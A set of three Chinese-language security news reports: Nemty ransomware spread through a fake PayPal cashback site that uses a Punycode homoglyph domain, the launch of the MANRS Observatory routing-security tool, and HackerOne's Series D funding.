黑客通过伪造 PayPal 网站传播勒索软件

近期,有网站通过冒充 PayPal 官网,向不知情的用户传播 Nemty 勒索软件的新变种。 这个恶意软件的运营商正在尝试各种分发渠道,因为它被检测出是 RIG 漏洞利用工具包(EK)的有效载荷。   通过返现奖励引诱用户 当前最新的 Nemty 来自于该假冒 PayPal 网站,该网站承诺,将返还支付金额的 3-5% 给使用该网站进行支付操作的用户。   网友可以通过一些细节判断出此网站并非官网,该网站也被多家主流浏览器标记为危险,但用户还是有可能会继续下载和运行恶意软件“cashback.exe”。 安全研究人员 nao_sec  发现了新的 Nemty 分发渠道,并使用 AnyRun  测试环境来部署恶意软件并在受感染的系统上跟踪其活动。 自动分析显示,勒索软件加密受害主机上的文件大约需要7分钟。具体时间可能因系统而异。 幸运的是,该勒索软件可以被市场上最流行的防病毒产品检测到。对 VirusTotal 的扫描显示 68 个防病毒引擎中有 36 个检测到了该软件。   同形字攻击 因为网络犯罪分子使用的就是原网页的构造,所以该诈骗网站看起来就是官方网站。 为了增强欺骗性,网络犯罪分子还使用所谓的同形异义域名链接到了网站的各个部分(包括帮助和联系,费用,安全,应用和商店)。 骗子在域名中使用来自不同字母表的 Unicode 字符。浏览器会自动将它们转换为 Punycode  Unicode 中的内容看起来像 paypal.com,而在Punycode 中以 ‘xn--ayal-f6dc.com’ 的形式存在。 安全研究员 Vitali Kremez 指出这个 Nemty 勒索软件变种目前处于1.4版本,此版本修复了前版本中的一些小错误。 他观察到的一件事是“isRU” 检查已经被修改了,该检查可以验证受感染的计算机是否在俄罗斯,白俄罗斯,哈萨克斯坦,塔吉克斯坦或乌克兰。在最新版本中,如果检查结果为真,那么恶意软件不会随着文件加密功能而移动。   但是,这些国家/地区以外的计算机会被设为目标,他们的文件会被加密,副本也会被删除。 根据测试显示,黑客提出的赎金为 0.09981 BTC,约为 1,000美元,并且支付门户被匿名托管在了 Tor 网络上。 8月底,另一位安全研究员  Mol69 看到Nemty 通过RIG EK 进行分发,这样的做法十分反常,因为瞄准 Internet Explorer 和 Flash Player 这些不受欢迎的产品的攻击套件目前已经基本不存在了。   消息来源:BleepingComputer, 译者:xyj,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

Web 工具 MANRS Observatory 发布:可监测网络路由安全

近期由非营利组织国际互联网协会(Internet Society)支持倡导的路由安全相互协议规范(MANRS)活动,致力于让互联网服务提供商注意他们的举止,特别是涉及如何使用边界网关协议(BGP),偶尔滥用通信方法驱动互联网流量的大部分路由。 在8月13日,MANRS倡议活动启动了MANRS Observatory,这是一项全新的Web工具,可以深入了解网络如何符合路由安全标准。该观察站为大多数用户提供了看不到的互联网部分透明度。 路由安全对网路的未来和稳定至关重要,但它却一直遭受威胁2018年有超过12000起路由中断或攻击事件,造成资料遭窃,损失收入,损害声誉等;去年因奈及利亚ISP业者引起的路由泄露,使得谷歌的讯务被误导至中国,导致世界许多地方网路中断,另外,今年6月,一次大规模的路由泄露让网路断线好几小时。 MANRS Observatory藉由追踪路由事件的数量,以及监测MANRS行动指标,来显示该网路遵守MANRS的合规程度。该工具将来自多个可信任第三方的数据,并使用对使用者友好的界面呈现。 使用MANRS Observatory工具的好处: 成效衡量指标:参与者可轻松地监控他们遵守MANRS要求的合规程度,并对其安全控制进行必要的调整。 业务发展:参与者可比较他们与同行间的表现,并利用MANRS瞭望台来判断潜在合作伙伴的安全措施是否达到标准。 政府:政策制定者更可了解路由安全和灵活性的情况,并透过呼吁采用MANRS最佳实践做改善。 社会责任:实施MANRS是自愿性的,步骤简单,且不会造成破坏瞭望台可协助参与者确保他们和同行的网路安全,也有助于提高整体网路的路由安全。   (稿源:cnBeta,封面源自网络。)

漏洞赏金平台 HackerOne 完成 3640 万美元 D 轮融资

据外媒VentureBeat报道,2018年,全球网络安全市场固定在1520亿美元,预计几年内将增长到2500亿美元。无论公司投入多少资金以确保其产品无故障,其系统中可能存在某些漏洞,使其容易被入侵。在此背景下,漏洞赏金平台HackerOne周日宣布,其已经在Valor Equity Partners领投的D轮融资中募集了3640万美元,另外包括Benchmark,New Enterprise Associates,Dragoneer Investment Group和EQT Ventures等跟投。 总部位于旧金山的HackerOne成立于2012年,是一个将公司与安全研究人员或“白帽黑客”联系起来的平台,后者将可以查找和报告软件应用程序中的安全漏洞而获得现金奖励。 除了为发现和报告漏洞的人提供奖励之外,HackerOne向公司收取20%的佣金。该公司表示,针对白帽黑客攻击关键漏洞的平均奖金现在为3384美元,同比增长48%,其中六名HackerOne社区成员的总收入超过100万美元。 早在6月份,在网络攻击危及数据并禁用关键计算机系统后,佛罗里达州的两个城市向黑客集体支付了超过100万美元的比特币赎金。这有助于说明针对不良行为者的吸引力应用程序和数据库漏洞 – 它不仅仅是窃取数据,因为勒索软件攻击也可以证明是非常有利可图的。此外,越来越多的软件公司成为网络犯罪分子的目标。这就是为什么投资者热衷于支持HackerOne及其旧金山竞争对手BugcroWD等漏洞赏金平台的原因,该公司去年筹集了2600万美元的资金。 “HackerOne正在引领新一波网络安全公司应对快速增长和更复杂的攻击带来的独特挑战,”Valor Equity Partners的David Obrand说道,他现在加入了HackerOne的董事会。“以黑客为动力的安全性已经存在,而且凭借其巨大的客户和黑客社区,HackerOne正在主导市场。” HackerOne声称其拥有一些著名的客户,包括阿里巴巴,Airbnb,美国国防部,Dropbox,高盛,英特尔,星巴克,Spotify,任天堂,PayPal,丰田,Twitter等等。根据该公司的说法,白帽黑客每天都会通过HackerOne与公司联系,并且在超过四分之三的新漏洞奖励计划中,一天之内就会报告一个有效的漏洞。据HackerOne称,其中四分之一被认为具有“高”或“严重”漏洞。 HackerOne首席执行官Marten Mickos补充说:“HackerOne的成立是为了让世界能够建立一个更安全的互联网。我们的业务增长速度超过了市场平均水平,随着一些世界领先组织(金融服务、零售、酒店等)越来越多的采用,现在是时候让全球所有组织都可以使用HackerOne社区和平台了这依赖于软件。” HackerOne之前筹集了大约7400万美元,其中包括2017年完成的4000万美元C轮融资。该公司计划加快全球扩张并扩大其“企业和数据驱动产品”。“这一轮新的资金使我们能够为每个人带来黑客驱动的安全性,”Mickos补充道。   (稿源:cnBeta,封面源自网络。)